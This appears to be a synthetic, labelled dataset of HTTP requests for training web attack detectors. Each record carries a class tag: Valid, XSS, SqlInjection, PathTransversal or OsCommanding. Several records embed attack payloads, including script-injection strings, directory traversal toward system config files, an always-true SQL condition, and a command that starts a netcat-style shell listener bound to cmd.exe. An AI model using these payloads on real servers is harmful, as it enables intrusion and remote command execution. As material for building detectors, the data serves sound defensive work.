Pragma: no-cache
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: Basic ZW9sSG86dHVvYWE=
Range: 11334-,-933
Referer: /Aa5liwao/iermeOct.cgi
TE: gzip,trailers
Trailer: Referer
User-Agent: ei4icmf/9.1
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 758x384
Via: 8.4 108.98.40.193, 9tei25/4.2 95.32.248.29:3614
Transfer-Encoding: gzip
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

odehen=dcncytyErrmest&De5rahoinminm=93340&roniaudsjcm=eonann9nnchq1zgl&shapg=tsyhtown4&trie=4imuE5ek&qdnihllwy=script alert  (ptlanameaiwm.brab6h)script   &mrdgreenenHpet=ncda&cuactcwainatIec=zTbITmVJy&laOnshAfet=T

End - Id: 46854
Start - Id: 46016
class: PathTransversal
PUT /cEmgRooptv/pFdJH/q5TDdcmd/ylP..tiff? HTTP/1.1
Content-Length: 265
Content-Language: onnoi
Content-Encoding: deflate
Content-Location: /vol9f5/fsat/iain.gif
Content-MD5: cmFzZW5jd2VhdmVsMWlPYw==
Content-Type: application/x-www-form-urlencoded
Host: www.a5Uda.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 146.217.44.89
Cookie: t8Njogrotr8d4=571781;eaioqnnsilLto4w=efg;kowlti=\WINDOWS\system.ini
Cookie2: $Version="79"
Date: Tue, 27 Apr 04 22:14:43 GMT
Expect: 100-continue
If-Modified-Since: Sun, 18 Apr 10 19:14:33 UTC
If-Unmodified-Since: Sun, 08 Jul 07 20:31:09 UTC
If-Match: *
If-Range: Tue, 21 Nov 06 16:17:27 GMT
Max-Forwards: 50
Proxy-Authorization: Reui iOuai=meriTAeb
Authorization: hfIvnE Lmo2eenp=ioUgiAm
Referer: http://www.yebio.ch/Yvua/nikgro.jsp
Trailer: Referer
User-Agent: hoaasntsoc (i96Y@5C; 5jJnZ4.@N)
Transfer-Encoding: deflate
Upgrade: wiiemb/3.3, ehnm/9.8, La7auu/5.4, s5s/8.9
Warning: 274 www.f69it.png "tte3Nhrad7oh9ljEo7r" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eeI8hbtorOXA=Nmtacevrpid1ch&lb=pHIXBA_2jjGz&etcWETSTyxS=nsendac llsennp&ctma0uoqxar=460598321&aQ4bcfXVnnby=3:<hc&hnpb9=hiNbA58@V&Au=6ilr&Unh6eMdwuhd=e:Thpwpd9w&emiyhau9iai=kgtrt&naeoitx9nad=vMH621BNt&lpvileot=oaK1dm&nuenee=005&ygBSsD=6620068387&tieeuaep=183

End - Id: 46016
Start - Id: 32091
class: Valid
GET /aayeaeaoyeha/ii6damneoRzlianxirnh/igsiWbtszrhh63/XuE-eJ0imzautoexecO.asp?dqiEm0Td=8095&acubzrhjeepoio=dumY&de5ohti=ytIeCagn3d+a&ootn0fea2hs=Moerrdeiyaeabts&ar3asftnoel=8jerguewScoeb&icdi=47&nepQrfE5wc=RSscgt&Emasn=55 HTTP/1.0
Host: 185.228.122.229
Connection: jeg3sdt
Accept: video/*;q=0.1, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, identity
Accept-Language: g3btnfts-enxip
Cache-Control: no-cache
Client-ip: 33.67.116.69
Cookie: ursjhr=218;ohw5fi6ge=7@2iw;EdeleteiiHE=5etusru;osMhchhabiepsii=604961;@documentgroup bycopyQA=c8e;1ou8gAsehasmflS=liR1ETmtgN-D
Cookie2: $Version="24"
Date: Mon, 30 Jul 07 04:54:59 GMT
ETag: W/"5PV8Py1fLbmc@v.6Mq9o"
Expect: 0iewarwe=henfgnde
From: eeej3@loctMytno.org
If-Modified-Since: Fri, 29 Apr 05 06:07:48 UTC
If-Unmodified-Since: Tue, 25 May 04 19:13:49 GMT
If-Match: "@_J9sFxIWZgD4ibDZB"
If-None-Match: "jf49Hz5u09jEzCQG.Wl"
If-Range: "_wEn7veqmMAAChttg"
Max-Forwards: 6842
MIME-Version: 2.6
Pragma: aveatfrr=kioehjm
Proxy-Authorization: Basic ZXNvbHRybzphRk9p
Authorization: Basic cmE3Yzp5YW9kbA==
Range: 130281-,-02625
Referer: /btbti3ir.php4
TE: trailers
Trailer: From
User-Agent: CIar/6.5.9
UA-CPU: MIPS
UA-Disp: 702,413,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 367x7496
Via: HTTP/3.1 www.8ieaxi4.html
Transfer-Encoding: compress
Upgrade: 7esxrt/2.4, oead/7.0, rsiaa/4.4, rte8e/6.3
Warning: 412 www.tsiiSsfi.jpeg "s4hN" "Mon, 17 Nov 08 12:26:07 UTC"
X-Forwarded-For: 15.97.140.41
X-Serial-Number: 4047270
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32091
Start - Id: 12954
class: Valid
GET /tr-S/m0bsaBq/awfNnNnfpDlciosgeial/teetoebc/hSLh8p25S.mdb?mesostaix=1h_3pDydMUKe HTTP/1.1
Host: 52.144.88.79
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: Aqfcudep-iuvM, ds2n-epuxco
Cache-Control: no-transform
Client-ip: 237.177.46.104
Cookie: aetuhu5luo9=5vulhrptne Yl';uVRH=oOdo;ecOosaq8roi=umethrpnoscript);scsghtaaTcsjood=arC2Uu6x85Ka;ieed=rklj;h4e=5connectoiet9arfe$m
Cookie2: $Version="04"
Date: Wed, 24 Sep 08 23:29:29 CET
ETag: "4G_.Z88SAafFTM5_"
Expect: 100-continue
From: I3hnmy@0fhsF.net
If-Modified-Since: Tue, 16 Mar 10 18:17:16 CET
If-Unmodified-Since: Wed, 28 Apr 04 01:12:49 GMT
If-Match: *
If-None-Match: "4mvufpFCFEA0coT"
If-Range: "2U@3y-QGkWuFkikeU8i."
Max-Forwards: 93
MIME-Version: 3.3
Pragma: vo='5u'
Proxy-Authorization: NTLM ZG5lYW1sb25pb0s4cnJUdW5vVG5UdGlvc2V0dGFOdEZ6
Authorization: Basic M3Bzc3Q0YTppYTFleg==
Range: -742
Referer: http://tcro3lsl.gov/haax.sh
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.4 (Machintosh; U; PPC Mac OS X 8.1; ee-Zs; rv:5.9.1) Gecko/94900889
UA-CPU: Sparc
UA-Disp: 5556,649,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3851x1864
Via: HTTP/6.1 www.Tstz9.css, 1.5 158.24.235.148, HTTP/8.0 231.244.35.240
Transfer-Encoding: compress
Upgrade: wsRo6a/8.5
Warning: 659 11.248.81.124 "abilo" 
X-Forwarded-For: 182.133.25.200
X-Serial-Number: 21717
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12954
Start - Id: 267
class: Valid
GET /altAhW.M5wG/tnuQaaUleRjahgl/qKH-SxoptFykKs/akstrIri4.js?Eotammnhar=dti50I&zg=6711977&_bUHZJGHKT=34848006&aieXLna0Dytwmea=%3FA%2B%3Aeeqa6w1ottrmBw&6mtnoej=tJo5UP&3Y76d0ugmssalwf=7&ontmfa2T=1&yq=51400&6OwWRreplace=esnAey&xahptnhocchn=rIi%3Asu%3Ftmpqbt%7E%3Dttd%3B2&ypemoticse=n%40whereuatct%7En HTTP/1.1
Host: 138.44.52.186
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.6, identity;q=0.8, identity
Accept-Language: o-sn;q=0.2, vogr-b;q=0.3, tswRm-tfaem;q=0.1, Yapie-rtEn;q=0.5
Cache-Control: min-fresh=3
Client-ip: 101.38.207.176
Cookie: eestP=ei;ntg6lerL9hlw=autoexec3nulle;ihoi=pd6e;yc7=iywe98Iuwc93
Cookie2: $Version="81"
Date: Tue, 01 Mar 05 13:45:34 CET
ETag: W/"6VFAg2ULcs_EddMM"
Expect: 100-continue
From: 6bLaew@vziehEtalu.st
If-Modified-Since: Sun, 12 Sep 04 24:43:41 GMT
If-Unmodified-Since: Mon, 15 Mar 10 18:11:53 UTC
If-Match: "jZ4Cs8BKUJWLi8fyAC"
If-None-Match: *
If-Range: Wed, 08 Feb 06 18:26:11 CET
Max-Forwards: 9
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM aXRzcHdpdHVqVnRpMG9hZTNtcmRpZXR1RXNoc2hjbHNhc3F0ZXNCMWFzcmk=
Authorization: Digest cnonce="dsosoe8o"
Range: 45-32,65908-442586,1566-181
Referer: /byTw1/yNYlhgwt/edtart/ejtira/n6n1.dll
TE: trailers
Trailer: Expect
User-Agent: ocetegoHqZ/9.2
UA-CPU: Sparc
UA-Disp: 223,1661,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4622x2387
Via: 7.1 www.hiUezsi.shtml, HTTP/4.8 126.109.98.57, 8.8 25.169.76.33
Transfer-Encoding: gzip
Upgrade: ire50s/8.5, lsas/9.0, cuedrY/9.7, o119/9.2
Warning: 583 117.40.109.55 "p3wiZwmotaawnneweih" "Tue, 23 May 06 21:35:57 GMT"
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 388092866322
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 267
Start - Id: 21652
class: Valid
GET /e0YXBx4rcq4dOfv/EmautoexecfFstyleA9f/invCP5.@Od/irsh/cD@VpoUvAmB_3j20/cs00IuY5c/omKYDcQHJmhlwIOfz/lSsVlbtZroan9iSc3l/r4XstyleL/se/8sReyVzHyD6QIbJ4h/R3tcenstelD0iiae.gif? HTTP/1.1
Host: 189.246.152.70
Connection: keep-alive
Accept: image/*;q=0.5
Accept-Charset: iso-2022-jp, cp-950;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: d-mcwtrm, ioLoaahn-rsgry;q=0.9
Cache-Control: only-if-cached
Client-ip: 211.84.162.129
Cookie: 1blrnibqD=5851;ehron68n=cm2aplnjc;em;rezh=68638;cfN26nmAe3R=eov:O o~t0Azevalxof@s;Amehohwwug=7t22nn8Gmut;MloodreMne=sirsuoRlsEfg
Cookie2: $Version="614"
Date: Wed, 05 May 04 10:31:25 UTC
ETag: W/"g-kp3mpGdOKD.w9SYxG"
Expect: 100-continue
From: ynfima@o2e6raaBs.org
If-Modified-Since: Mon, 02 Apr 07 13:46:12 GMT
If-Unmodified-Since: Fri, 05 Mar 04 06:56:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 26
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="mwtEreq"
Authorization: Basic ZWVvcjA6aXIwcjY=
Range: -349003,1849-0578
Referer: http://sietfe5.net/VgSu/coa8oh4.shtml
TE: trailers,deflate
Trailer: Expect
User-Agent: Mozilla/8.5 (Machintosh; U; PPC 8.8; ET-uz; rv:1.1.7) Gecko/17128928
UA-CPU: PowerPC
UA-Disp: 4503,714,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 838x039
Via: 2.5 www.tldZio.htm, HTTP/6.4 35.166.12.185:40
Transfer-Encoding: deflate
Upgrade: asow/5.8, xtg/8.7, Dbta/5.2
Warning: 753 www.r8e8sd.jpeg "PRrTs4cebef6fdeoabnr" "Sun, 27 Mar 05 04:06:35 CET"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 1329095
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21652
Start - Id: 47605
class: XSS
GET /E9HyY00M5A/eies/N3mms2h1Iuoeaah/t6NzEuNb4gQejjp4/rnlEeoc9ejcr4locee.png?nwehn=7aperlieh5drVf9na&1a=%3Cimg++++dynsrc+++%3D++%22+++javascript%3A+++%5Balert+%28%27nhtAOe%27%29%3B%5D+++++%22+%3E&uelfsh=67606&vmolceea1=72317&_4XeusINI=f7woikhptfO4 HTTP/1.1
Host: www.RO5nye.de
Connection: homtpnog
Accept: text/*;q=0.5, video/*
Accept-Charset: utf-7;q=0.8, macintosh;q=0.1, koi8-r;q=0.1, x-mac-chinesesimp;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 179.141.108.140
Cookie: qtt4B8ncp=formarph;-netcatkEYlEEPI=2411
Cookie2: $Version="75"
Date: Thu, 27 Sep 07 05:51:57 GMT
ETag: "nwTH@gkWC5HyBDgr7v"
Expect: pUonr4u1
From: b5GeiRai@2s2t.st
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Mon, 19 Jan 09 20:23:26 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6731
MIME-Version: 8.3
Pragma: hryrcpe=7iap
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: tl7roE r0ua199a=uE1o5
Range: 849916-
Referer: http://www.slN5.org/ts2dX/kbumrLmc/2Rvzytl/eh0ee.jpeg
TE: trailers,deflate
Trailer: Trailer
User-Agent: pwdYfbhBaeerhgolado
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 608x141
Via: HTTP/2.6 248.20.67.74, 0.8 www.ocdy9ie.jpg, 2.1 33.36.17.255
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 002 240.231.55.176:97 "DparR" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47605
Start - Id: 42892
class: OsCommanding
GET /teFaikersukyeeuio0.asp?Eyeipt2mIru5jm=%7C+shell%28++%22cmd+++%2Fc++++c%3AInetpubwwwrootMSISSnc.exe+++-l+++-p+++4523+++-t+++-e+cmd.exe++++%22%29+++++%7C%27&Jgu6=smaY-7tgWJ.&kaoEutsjn4hh=8306410&haqa=m._&iihhLPas8so=4sYaW58&ptoa=635&s6=4638506&ahbaahDVob6=irtlds&xEsock_streamH9mbinL=tiTn5prcenvl1aoE&0processing-instruction7-Bex0in=+n&atatsAepktsna8=a5uhhmyAt4xe HTTP/1.0
Host: 208.87.218.121
Connection: 1hsp
Accept: */*
Accept-Charset: cp-950, iso-8859-5, x-mac-arabic;q=0.8, iso-8859-6;q=0.5, iso-8859-8-i;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: ikm='int'
Client-ip: 133.170.78.11
Cookie: E6l9=ul;ncadmineerndtriro1;ssneouIw=xr4e;xsb3ie4e=0;ui=p%sor;r0xG3I6ox=mtt=a;leg2sdozgFIzaqi=ftp&
Cookie2: $Version="01"
Date: Wed, 03 May 06 23:50:09 GMT
ETag: "WFx0V8-G0IWrsBeb9@if"
Expect: tlgm
From: 2yoeb@2treday.de
If-Modified-Since: Thu, 04 Jun 09 09:27:57 GMT
If-Unmodified-Since: Sun, 03 May 09 03:17:04 UTC
If-Match: "WLguFANUa.fEYhpxz"
If-None-Match: "R@EvXuddvJEfEq_KDeX"
If-Range: "i4BeELYj1QFHPWkTSUs"
Max-Forwards: 67
MIME-Version: 1.5
Pragma: ln5cst='spt'
Proxy-Authorization: NTLM aWRkcWhsaTFkaDVIc2pvZXNoc3J0cmVzeHlldWVCeWVzbg==
Authorization: Basic bWF0UzppYXVpYWlsdA==
Range: -057067,0-214264
Referer: /dtmar/etgcOct/uml1a/ivcr.mp3
TE: gzip;q=0.0
Trailer: Upgrade
User-Agent: cekt6rwed3nden3irln
UA-CPU: 68000
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4835x5695
Via: 5.0 242.240.123.253, 3.1 104.254.236.200:42, 2.5 165.19.12.44
Transfer-Encoding: gzip
Upgrade: se2e/5.7, aFn/6.1, nsr3i/8.1, n5rtn/7.7, de7esn/5.5
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 1739774036930
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42892
Start - Id: 24862
class: Valid
GET /WEu4e/rsfe7taveAtgKe15R/o2/d6oieadsmTjb5sr/e5tighohse.php4?rnne=8451032 HTTP/1.0
Host: 1.75.0.186:96500
Connection: e9ao
Accept: audio/x-wav, image/gif, text/xml;q=0.8
Accept-Charset: x-mac-korean, x-mac-japanese
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 30.241.236.137
Cookie: ow=3oaaktrtnt;Egs31qR=094995
Cookie2: $Version="6"
Date: Tue, 06 Jan 09 01:18:43 UTC
ETag: W/"FpNzx_iVoM1opmx3"
Expect: Ohnisszs
From: sh8phfi@erte.it
If-Modified-Since: Tue, 03 May 05 07:54:21 CET
If-Unmodified-Since: Sat, 27 May 06 09:03:00 CET
If-Match: "jilXc5QIhnbbJSEK0c9"
If-None-Match: "aqW5-fmPp7Hw7yF-mQWE"
If-Range: Thu, 11 May 06 05:38:31 GMT
Max-Forwards: 12
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic YWJlcmR2azpuNmphZW4=
Authorization: NTLM RXJlNGRwcm9waTN0ZWFyYWl1aXJwd2hzNWdvc2VwaG9oZ2VTRndlMQ==
Range: -94
Referer: http://nywmojb.it/nEells.php
TE: chunked;q=0.6,deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.5 (Windows; U; WinNT 0.4; ap-fT; rv:5.6.0) Gecko/44453187
UA-CPU: MIPS
UA-Disp: 139,614,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 265x4380
Via: oletU/1.5 www.eotrs.html
Transfer-Encoding: deflate
Upgrade: htg0Oe/2.3, CC7t1n/7.2, a9jg/6.9
Warning: 569 www.oq8ot.css "draaicTya4hanxeos" 
X-Forwarded-For: 117.106.89.58
X-Serial-Number: 6519441823868063774
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24862
Start - Id: 24688
class: Valid
GET /cvtnlsmI/wrpsaerwr7tpuoetxh/styGctcNie1sQZM3/emus1f8io6n5iHo4t/eYtelnetHSJjDZ.SperltQ/tWcGnpWh1/nj/ecr4j1nlUsrocnc/ramtWGXZ627lYT-t/tb5izoxhn9tt/shS.gif?zsnhAe0ht=so0iwyiindyseae1hr&elfxTrestp=og1DZxy&atdte=99&HlsbupRuaJfawnc=2781&access_logvHnOPud.wa=ltdtGonN&ytkt0Estd07e=r%28celibrvhhbaf&tfhRawIeecudet=fttehakflia0m&erre=flpadSGd&nofsnetn=81632791&tti3nireo=%5Cn&wnaossnpeeHgih=trmxfw&jotaft2imzlrt=taiserhunionna&6qQyevaluexec=%40%2Bi+i6%7E4raq+are&cr0=7 HTTP/1.0
Host: www.oimnW.st
Connection: keep-alive
Accept: video/mpeg;q=0.3, video/*
Accept-Charset: iso-8859-8, cp-950;q=0.4
Accept-Encoding: 
Accept-Language: uihso0-tg2, ie-ttoe8
Cache-Control: max-age=91502
Client-ip: 130.174.201.192
Cookie: 4csieenf=9;WGnetcatYdPl@Ne=s/<;daeuuk44iAe=4tssnqeyqdo=6w;wehaQatt=ctiamYrjrnuyto;ecovhbl=aB@Sil
Cookie2: $Version="43"
Date: Mon, 14 Feb 05 02:00:03 CET
ETag: W/"RA93g4f79hQLCowl8Xs"
Expect: 100-continue
From: dsetoca@p0seNgaU4a.de
If-Modified-Since: Fri, 26 May 06 23:13:51 CET
If-Unmodified-Since: Sun, 12 Dec 04 05:33:27 GMT
If-Match: "BjVB.lQmRl6l9WtvxE"
If-None-Match: "CG7HTWP2z5BeIPjHyZn5"
If-Range: *
Max-Forwards: 8692
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest response="429aD00b8DDd9df7B74f8ecAC24D449D"
Authorization: Digest username="mu6tmuf"
Range: 1773-,147343-45947,-7279
Referer: http://www.wexgrEe.net/srEhee/svuecwn8/koteaoig/es5x/9rmo.tiff
TE: chunked,gzip
Trailer: If-Match
User-Agent: Aenvr0n (evhwrqT6N9; 5dnSCs; fWTlGsi5i; obIJ11sR; u5oWJdraOS)
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 089x5784
Via: HTTP/7.7 www.exne5.jpeg:16651
Transfer-Encoding: compress
Upgrade: gda/0.6, oNeaDt/1.7, not/8.6, 057tp1/2.2
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 248.154.151.220
X-Serial-Number: 05865096
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 24688
Start - Id: 21947
class: Valid
GET /cridSvregnagu/oc0J45GEw/b8iaenetdshrkr/LpN_.jMyMHKhP/TnhstlidtrRRalar/hf/Dps/owMHtemarS/hEd0uqm/rntCifnhefoeOeElOted/kaMLWioxZUkldG/cs6elsttnatpdoet.exe?ahtsAaiiclspor=ht HTTP/1.1
Host: www.hnmaiiI.cz
Connection: oaeaeeZS
Accept: image/png;q=0.1, text/*, application/*;q=0.9
Accept-Charset: iso-8859-8-i;q=0.5, x-mac-turkish, iso-8859-2;q=0.7, iso-8859-5;q=0.1
Accept-Encoding: gzip;q=0.7
Accept-Language: *;q=0.4
Cache-Control: max-age=35
Client-ip: 191.101.191.71
Cookie: XuzwstZ@=202;9iXlikeNW=drdgoldteoeakrcmds
Cookie2: $Version="472"
Date: Mon, 30 Aug 04 17:09:39 GMT
ETag: W/"cB.CPcl.9laMIug"
Expect: 100-continue
From: slg5eH@arfeenAeg.net
If-Modified-Since: Thu, 02 Oct 08 11:00:19 CET
If-Unmodified-Since: Thu, 17 Sep 09 12:29:21 GMT
If-Match: *
If-None-Match: "rFZQ@HxYQnn0d4QZBL"
If-Range: "S5GMp7hT7GhYHPebYio."
Max-Forwards: 2969
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic ZmVjb2tmTDpvbXBl
Authorization: Basic aTdpb2RGWDpyU2hOU2Nm
Range: 81-3452
Referer: http://2lec1aan.net/ljus/a6na/yrOi/eDiu2da/ad9teLo.doc
TE: gzip
Trailer: If-Match
User-Agent: movHMj2S http://www.enet.st
UA-CPU: x86
UA-Disp: 069,983,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 350x171
Via: 3.1 95.103.80.107, HTTP/9.1 54.98.133.52:665, 8.1 www.ueimm.shtml
Transfer-Encoding: compress
Upgrade: fysst/0.3
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 20.222.130.202
X-Serial-Number: 09176432061314
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21947
Start - Id: 16911
class: Valid
GET /t@cwYp_@iucixe7gX-jy/eMoimae/Dyceooa6t/aZP_mKwWZ04I7bb/mZxktOWT0IdMhzlR/shYE/Dlsdhrrext5felfse/z4cOuatInjly/o3RCC3pL-kP/l5BGunionUSZPXX_wHy.exe?nul=19&7erl2=C7col3&uu8FI6AM=ets HTTP/1.1
Host: 24.162.106.31
Connection: close
Accept: application/postscript, audio/basic;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.2, compress;q=0.4
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 254.25.138.231
Cookie: tatnsNl1=cs;qtfALirB4elpo=aIKJBki4CYWN;Ditnopionis=5789782
Cookie2: $Version="10"
Date: Sun, 28 Jun 09 15:38:08 UTC
ETag: W/"12Ne@V_DU0DcIxV"
Expect: 100-continue
From: lieouw@nat4Ue.st
If-Modified-Since: Fri, 25 Dec 09 17:21:36 GMT
If-Unmodified-Since: Tue, 22 Nov 05 07:11:32 CET
If-Match: "RA1iAKtFDd_WOMO4Ds"
If-None-Match: "16hj8I50rmTziZ_3Z"
If-Range: "7pv_Hs.VhOJp9lEGUn"
Max-Forwards: 1
MIME-Version: 7.6
Pragma: c='setnr'
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: NTLM NnRvZnN5ZW5odHFlbnRlYW90dGZpc2VsTHVuMnNpVHRPcDg=
Range: -3
Referer: http://www.gahitml.com/ierau0tw.jsp
TE: deflate;q=0.5,deflate;q=0.6,chunked
Trailer: Accept
User-Agent: Mozilla/9.4 (compatible; 3wstkezwn5; Win 9x; e0qst; ee9rUybr4; rdres)
UA-CPU: StrongARM
UA-Disp: 077,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x8989
Via: uad/2.7 140.236.54.111, 3.9 48.167.250.93, 2.8 www.x3lShKrr.shtml
Transfer-Encoding: deflate
Upgrade: dHed/7.3, olnnat/3.7, o5p/0.1, wnMa/3.1, arrnc/1.6
Warning: 961 www.El3ett.jpg "wosiueayliee1e9dNy8d" 
X-Forwarded-For: 164.142.194.146
X-Serial-Number: 49349501670921026
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 16911
Start - Id: 46193
class: PathTransversal
GET /owXFzbfdZOlGurFW/5RoBLq112ISWQB22uWX3/dr4enc4urelHipetonAj/trepAc1hbul4r2/cV.js?dor=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fsrdwrv.conf&nteatf=7e&lhfuas4alqieadl=p2eatsmor HTTP/1.1
Host: 182.6.105.218
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: dWBnthsr-3i;q=0.1, 2a-isa;q=0.6, pobfntFh-g3dga, euer-ruiat
Cache-Control: oSs=a
Client-ip: 158.116.5.64
Cookie: imnzm=hu7N;oha2qeiyyewth=hzRCkGwFdA3;oCDg5=@@bp;owtMn5pes1xYm=44;etswaoteht=tIdRbljVYK6z
Cookie2: $Version="17"
Date: Fri, 16 Feb 07 04:21:21 UTC
ETag: "gKxZOaLRu1jDtbWY"
Expect: xcdqeus=aitrtthe;gkdhcus
From: sloo@sd406oko.ch
If-Modified-Since: Fri, 29 Aug 08 18:03:03 UTC
If-Unmodified-Since: Sat, 28 Jan 06 12:20:51 GMT
If-Match: "pv2eHXEXrNBXFRj1Szr"
If-None-Match: *
If-Range: "-Rj9Lq3GxzlX@C-3r-"
Max-Forwards: 097
MIME-Version: 2.5
Pragma: 3e=xsS
Proxy-Authorization: Basic Z2Q2bmVlOmFsaWd0aA==
Authorization: ahnoa aodie=eHwl2li
Range: 3-60707,6378-,-00133
Referer: http://hL6on.gov/7haloe8/roriae/hhoniee.php4
TE: trailers,chunked,gzip;q=0.4
Trailer: Accept-Language
User-Agent: h9rUi0de
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 939x7286
Via: HTTP/3.9 253.157.170.106, 3.8 www.np1tf4u9.htm:6310
Transfer-Encoding: gzip
Upgrade: eesinn/1.0, mc0b/6.6, eaa9an/7.8, olCrho/0.4, dhbfna/5.5
Warning: 885 150.132.83.196:7 "UN6M8draouta3nienwag" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 4158799
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46193
Start - Id: 41947
class: SqlInjection
GET /iTnsedflpurqmuii1t38/eWkmt_lPjxYhWc.png?91bulLnpaesob=87996&owtezeadslnmhf=%3F%5Cnetcatt%27&gtapartdrt=ea&sot=OsE%3E+nacsaKit&iey=n&bwltfaepsa=saccess_logfw%3Bfo&_5nHtzw6JlQ%u=OR+++++%27pqeNoola%27++%3D++%27Sim%27%2B%27ple%27 HTTP/1.0
Host: www.doy8mhPy.net
Connection: ir506b
Accept: video/*;q=0.4, video/quicktime
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: w-ne2Tt
Cache-Control: no-transform
Client-ip: 144.179.215.34
Cookie: 6mrmSri=libmyeUo2tl3n=whereqhobjectm
Cookie2: $Version="26"
Date: Mon, 22 Oct 07 15:34:34 GMT
ETag: W/"-ASILb_HXgt9Qe_N"
Expect: aeeedy
From: LtoaiMii@xdfo4enhse.be
If-Modified-Since: Fri, 17 Apr 09 02:17:04 GMT
If-Unmodified-Since: Fri, 04 Jan 08 13:50:43 UTC
If-Match: *
If-None-Match: "5ZlG8oNFpAZ5Ob3hF"
If-Range: *
Max-Forwards: 1899
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: aies sesl=fkaciu
Authorization: ltg0u zeLs=HjccvX
Range: 55660-
Referer: /dAnrwmt.css
TE: trailers,trailers,chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.5 (Windows; U; Win 9x 3.5; r6-sc; rv:6.5.2) Gecko/44654916
UA-CPU: x86
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: oaio4
Upgrade: imn/2.9
Warning: 021 www.mcyot.gif "hrtenvrrnpri" 
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 41242078999326437
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41947
Start - Id: 16000
class: Valid
GET /TFwkabKRHiRvfu/pShchxcjs4z@7kb/FA.swf? HTTP/1.1
Host: 186.114.72.128
Connection: close
Accept: */*
